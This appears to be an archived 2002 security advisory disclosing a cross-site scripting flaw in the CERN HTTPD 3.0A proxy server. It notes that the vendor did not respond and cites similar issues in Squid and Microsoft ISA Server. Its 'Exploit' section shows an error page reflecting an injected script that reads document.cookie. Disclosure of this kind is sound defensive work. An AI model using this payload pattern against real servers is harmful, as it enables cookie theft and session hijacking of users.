Lucene search
SecurityvulnsSECURITYVULNS:DOC:3368HistoryAug 16, 2002 - 12:00 a.m.
CERN Proxy Server: Cross-Site Scripting Vulnerability
2002-08-1600:00:00
vulners.com
2107
CERN Proxy Server: Cross-Site Scripting Vulnerability
Affected:
CERN HTTPD 3.0A
http://www.w3.org/Daemon/Activity.html
Vendor Status:
CERN httpd team ([email protected]) was notified on Aug 10, 2001 but
they did not respond.
Exploit:
========================================================
<HTML>
<HEAD>
<TITLE>Error Message</TITLE>
</HEAD>
<BODY>
<H1>Fatal Error 500</H1>
Can't Access Document:
http://nonexistenthost.google.com/<SCRIPT>document.write(document.cookie)</SCRIPT>.
<P>
<B>Reason:</B> Can't locate remote host: nonexistenthost.google.com.
<P>
…snip…
Similar problems have been found in Proxomitron Naoko-4 BetaFour,
Microsoft ISA Server and Squid 2.4 DEVEL4.
<http://www.securityfocus.com/bid/3087>
<http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
<http://www.securityfocus.com/archive/1/197606>
Best regards,
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/